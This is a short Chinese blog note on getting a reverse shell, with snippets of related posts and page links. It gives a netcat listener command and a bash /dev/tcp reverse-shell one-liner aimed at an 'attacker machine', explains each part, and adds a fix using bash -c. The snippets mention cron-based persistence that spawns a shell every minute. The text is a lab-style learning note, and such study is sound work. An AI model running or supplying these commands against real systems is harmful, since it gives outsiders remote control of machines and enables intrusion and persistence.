攻击机 192.168.188.140
执行 nc -lvvp 8888监听本地8888端口
bash -i >& /dev/tcp/192.168.188.140/8888 0<&1 2>&1与140主机8888端口建立一个tcp连接。
bash –i打开一个交互的bash,
/dev/tcp建立一个socket连接,
>&将标准错误输出重定向到标准输出中,
执行之后即可得到shell
TIM图片20190109163808.png
一开始做的时候其实是用140当目标机的,但是运行bash -i >& /dev/tcp/192.168.188.140/8888 0<&1 2>&1一直报错显示/dev/tcp文件不存在,百度也没找到解决方法。
刚看到王一航师傅的博客才发现问题出在了哪里,所以最好还是用bash -c 'bash -i >& /dev/tcp/192.168.188.140/8888 0<&1 2>&1'
前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...
例如开机自启cmd 自启nc反弹shell(一) 自启nc反弹shell(二)
反弹Shell https://www.cnblogs.com/cocowool/p/reverse-shell....
Reverse Shell bash反弹服务端: bash -c 'sh -i &>/dev/tcp/210.28...
bash -i 操作 攻击机 192.168.188.140执行 nc -lvvp 8888监听本地8888端口 ...
背景 前段时间因为使用Flink默认配置,没有禁用通过web上传jar包提交作业的功能,同时服务器配有公网地址,也...
0X01 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到...
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹sh...
每一分钟执行一次 ubuntu目录:/var/spool/cron/crontabs/ 每分钟反弹一个sh cen...
什么是shell shell是渗透中常用的名词,像getshell,webshell,反弹shell等等,都和sh...
本文标题:反弹shell
本文链接:https://www.haomeiwen.com/subject/ssygrqtx.html
网友评论